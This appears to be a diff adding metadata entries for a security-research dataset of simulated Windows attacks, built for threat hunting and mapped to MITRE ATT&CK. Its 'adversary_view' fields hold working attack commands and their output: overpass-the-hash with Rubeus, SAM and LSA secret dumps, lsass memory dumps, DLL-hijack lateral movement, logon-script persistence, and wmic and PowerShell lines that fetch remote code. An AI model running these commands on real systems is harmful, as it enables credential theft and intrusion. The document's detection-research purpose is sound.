+            "adversary_view": "(Empire: G6BYHU4F) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\\Windows\\System32\\cmd.exe\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 4\n(Empire: 4EH9PC5S) > \n______        _                      \n  (_____ \\      | |                     \n  _____) )_   _| |__  _____ _   _  ___ \n  |  __  /| | | |  _ \\| ___ | | | |/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____/|____/|_____)____/(___/\n\n  v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Showing process : False\n[+] Process         : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\n[+] ProcessID       : 10064\n[+] LUID            : 0x42e7ba4\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Target LUID : 70155172\n[*] Building AS-REQ (w/ preauth) for: 'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n      UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB\n      kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t\n      StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4\n      cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc\n      c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8\n      46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61\n      8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ\n      FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h\n      BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl\n      5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W\n      pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb\n      1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9\n      T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a\n      sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd\n      4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa\n      7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q\n      ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO\n      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D\n      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy\n      MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[*] Target LUID: 0x42e7ba4\n[+] Ticket successfully imported!\n\n  ServiceName           :  krbtgt/theshire.local\n  ServiceRealm          :  THESHIRE.LOCAL\n  UserName              :  pgustavo\n  UserRealm             :  THESHIRE.LOCAL\n  StartTime             :  9/21/2020 11:03:07 PM\n  EndTime               :  9/22/2020 9:03:07 AM\n  RenewTill             :  9/28/2020 11:03:07 PM\n  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable\n  KeyType               :  rc4_hmac\n  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==\n\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) > "
+        },
+        "references": [
+            "https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:48.438554+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200922042230.yaml": {
+        "title": "Empire Powerdump Extract Hashes",
+        "id": "SDWIN-200922042230",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/09/22",
+        "modification_date": "2020/09/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Calculating SysKey",
+            "SAM Read"
+        ],
+        "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_powerdump_sam_access.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "powerdump",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: powershell/credentials/mimikatz/sam) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:21:35  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/powerdump*\n(Empire: powershell/credentials/powerdump) > info\n\n              Name: Invoke-PowerDump\n            Module: powershell/credentials/powerdump\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  DarkOperator\n  winfang\n  Kathy Peters\n  ReL1K\n\nDescription:\n  Dumps hashes from the local system using Posh-SecMod's\n  Invoke-PowerDump\n\nComments:\n  https://github.com/darkoperator/Posh-\n  SecMod/blob/master/PostExploitation/PostExploitation.psm1\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/powerdump) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 4\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/powerdump\n(Empire: powershell/credentials/powerdump) > \nJob started: TASK2D\n\nwardog:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n(Empire: powershell/credentials/powerdump) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:48.635596+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201009173318.yaml": {
+        "title": "Covenant Remote WMI Wbemcomn DLL Hijacking",
+        "id": "SDWIN-201009173318",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/09",
+        "modification_date": "2020/10/09",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "SMB CreateRequest"
+        ],
+        "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the WMI provider host (wmiprvse.exe) for lateral movement.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Remote WMI Wbemcomn DLL Hijack",
+                "link": "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_wbemcomn_dll_hijack.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_wbemcomn_dll_hijack.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                },
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "Copy",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Copy /source:\"C:\\ProgramData\\test.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Windows\\System32\\wbem\\wbemcomn.dll\"\n\nShellCmd /shellcommand:\"wmic /node:WORKSTATION6 os get\""
+        },
+        "references": [
+            "https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:48.845594+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201009183000.yaml": {
+        "title": "Covenant Remote DCOM Iertutil DLL Hijacking",
+        "id": "SDWIN-201009183000",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/09",
+        "modification_date": "2020/10/09",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "SMB CreateRequest"
+        ],
+        "description": "This dataset represents adversaries abusing a DLL hijack vulnerability found in the execution of the DCOM InternetExplorer.Application class for lateral movement.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Remote DCOM IErtUtil DLL Hijack",
+                "link": "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_iertutil_dll_hijack.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_iertutil_dll_hijack.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "PowerShell",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L529"
+                },
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "Copy",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/DefaultGruntTasks.yaml#L951"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Copy /source:\"C:\\ProgramData\\test2.dll\" /destination:\"\\\\WORKSTATION6\\C$\\Program Files\\Internet Explorer\\iertutil.dll\"\n\nPowerShell /powershellcommand:\"$i=[activator]::CreateInstance([type]::GetTypeFromProgID('InternetExplorer.Application','172.18.39.6'))\""
+        },
+        "references": [
+            "https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:49.582376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201012183248.yaml": {
+        "title": "Covenant Wuauclt CreateRemoteThread Execution",
+        "id": "SDWIN-201012183248",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/12",
+        "modification_date": "2020/10/12",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "CreateRemoteThread"
+        ],
+        "description": "This dataset represents adversaries proxy executing code via the Windows Update client utility. In order to bypass rules looking for the binary reaching out directly to the Internet, this dataset shows the binary creating and running a thread in the virtual address space of another process via the CreateRemoteThread API.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Signed Binary Proxy Execution via CreateRemoteThread",
+                "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-201012183248.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_lolbin_wuauclt_createremotethread.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Upload /filepath:\"C:\\ProgramData\\SimpleInjection.dll\"\n\nShellCmd /shellcommand:\"C:\\Windows\\System32\\wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\SimpleInjection.dll /RunHandlerComServe\""
+        },
+        "references": [
+            "https://dtm.uk/wuauclt/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:49.769376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201017061100.yaml": {
+        "title": "WMIC Remote XSL Jscript Execution",
+        "id": "SDWIN-201017061100",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/17",
+        "modification_date": "2020/10/17",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents adversaries proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (jscript).",
+        "attack_mappings": [
+            {
+                "technique": "T1220",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/wmic_remote_xsl_jscript.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "ART",
+                    "module": "wmicscript",
+                    "script": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "wmic process list /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\""
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/910a2a764a66b0905065d8bdedb04b37049a85db/atomics/T1220/T1220.md#atomic-test-4---wmic-bypass-using-remote-xsl-file",
+            "https://twitter.com/dez_/status/986614411711442944"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:49.963842+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201018195009.yaml": {
+        "title": "Lsass Memory Dump via Comsvcs.dll",
+        "id": "SDWIN-201018195009",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/18",
+        "modification_date": "2020/10/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.2536dee2-12fb-459a-8c37-971844fa73be"
+        ],
+        "description": "This dataset represents adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_lsass_memory_dump_comsvcs.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Powershell",
+                    "module": "Powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll",
+            "https://twitter.com/shantanukhande/status/1229348874298388484",
+            "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:50.196374+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201018225619.yaml": {
+        "title": "Lsass Memory Dump via Syscalls",
+        "id": "SDWIN-201018225619",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/18",
+        "modification_date": "2020/10/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.7ae7102c-a099-45c8-b985-4c7a2d05790d"
+        ],
+        "description": "This dataset represents adversaries using system calls (syscalls) and API unhooking to dump the memoty contents of lsass.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_lsass_memory_dumpert_syscalls.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Users\\wardog\\Desktop>Outflank-Dumpert.exe\n________          __    _____.__                 __\n\\_____  \\  __ ___/  |__/ ____\\  | _____    ____ |  | __\n  /   |   \\|  |  \\   __\\   __\\|  | \\__  \\  /    \\|  |/ /\n/    |    \\  |  /|  |  |  |  |  |__/ __ \\|   |  \\    <\n\\_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \\\n        \\/                             \\/     \\/     \\/\n                                  Dumpert\n                              By Cneeliz @Outflank 2019\n\n[1] Checking OS version details:\n        [+] Operating System is Windows 10 or Server 2016, build number 18363\n        [+] Mapping version specific System calls.\n[2] Checking Process details:\n        [+] Process ID of lsass.exe is: 756\n        [+] NtReadVirtualMemory function pointer at: 0x00007FFB929DC890\n        [+] NtReadVirtualMemory System call nr is: 0x3f\n        [+] Unhooking NtReadVirtualMemory.\n[3] Create memorydump file:\n        [+] Open a process handle.\n        [+] Dump lsass.exe memory to: \\??\\C:\\windows\\Temp\\dumpert.dmp\n        [+] Dump succesful.\n\nC:\\Users\\wardog\\Desktop>"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking",
+            "https://github.com/outflanknl/Dumpert",
+            "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:50.438376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201019002900.yaml": {
+        "title": "SAM Copy via Esentutl VSS",
+        "id": "SDWIN-201019002900",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/19",
+        "modification_date": "2020/10/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.a90c2f4d-6726-444e-99d2-a00cd7c20480"
+        ],
+        "description": "This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\\ProgramData\\SAM\n\nExtensible Storage Engine Utilities for Microsoft(R) Windows(R)\nVersion 10.0\nCopyright (C) Microsoft Corporation. All Rights Reserved.\n\nInitializing VSS subsystem...\n\nInitiating COPY FILE mode...\n    Source File: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\nDestination File: C:\\ProgramData\\SAM\n\n                      Copy Progress (% complete)\n\n          0    10   20   30   40   50   60   70   80   90  100\n          |----|----|----|----|----|----|----|----|----|----|\n          ...................................................\n\n        Total bytes read                = 0x9000 (36864) (0 MB)\n        Total bytes written             = 0x9000 (36864) (0 MB)\n\n\nOperation completed successfully in 4.859 seconds.\n\nC:\\Users\\wardog>"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:50.647378+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201019033054.yaml": {
+        "title": "Psexec Reg LSA Secrets Dump",
+        "id": "SDWIN-201019033054",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/19",
+        "modification_date": "2020/10/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.55295ab0-a703-433b-9ca4-ae13807de12f"
+        ],
+        "description": "This dataset represents adversaries using psexec to run reg.exe as system and dump LSA secrets. Location HKLM\\security\\policy\\secrets.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_psexec_lsa_secrets_dump.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Users\\wardog\\Downloads\\PSTools>PsExec.exe -accepteula -s reg save HKLM\\security\\policy\\secrets %temp%\\secrets\n\nPsExec v2.2 - Execute processes remotely\nCopyright (C) 2001-2016 Mark Russinovich\nSysinternals - www.sysinternals.com\n\n\nThe operation completed successfully.\nreg exited on WORKSTATION5 with error code 0.\n\nC:\\Users\\wardog\\Downloads\\PSTools>"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md#atomic-test-1---dumping-lsa-secrets"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:50.847375+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201019224718.yaml": {
+        "title": "Logon Scripts via UserInitMprLogonScript",
+        "id": "SDWIN-201019224718",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/19",
+        "modification_date": "2020/10/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.d6042746-07d4-4c92-9ad8-e644c114a231"
+        ],
+        "description": "This dataset represents adversaries leveraging logon initialization scripts to achieve persistence via the UserInitMprLogonScript user environment.",
+        "attack_mappings": [
+            {
+                "technique": "T1037",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0003"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/cmd_userinitmprlogonscript_batch.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Microsoft Windows [Version 10.0.18363.1139]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\wardog>echo \"echo Art Logon Script atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > %temp%\\art.bat\n\nC:\\Users\\wardog>REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d %temp%\\art.bat /f\nThe operation completed successfully."
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:51.020376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201019232515.yaml": {
+        "title": "Mavinject Process DLL Injection",
+        "id": "SDWIN-201019232515",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/19",
+        "modification_date": "2020/10/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.74496461-11a1-4982-b439-4d87a550d254"
+        ],
+        "description": "This dataset represents adversaries leveraging",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mavinject_dll_notepad.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "powershell",
+                    "module": "powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "PS C:\\Users\\wardog> Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll\" -OutFile C:\\ProgramData\\T1055.dll\nPS C:\\Users\\wardog> $mypid = (Start-Process notepad -PassThru).id\nPS C:\\Users\\wardog> mavinject $mypid /INJECTRUNNING C:\\ProgramData\\T1055.dll"
+        },
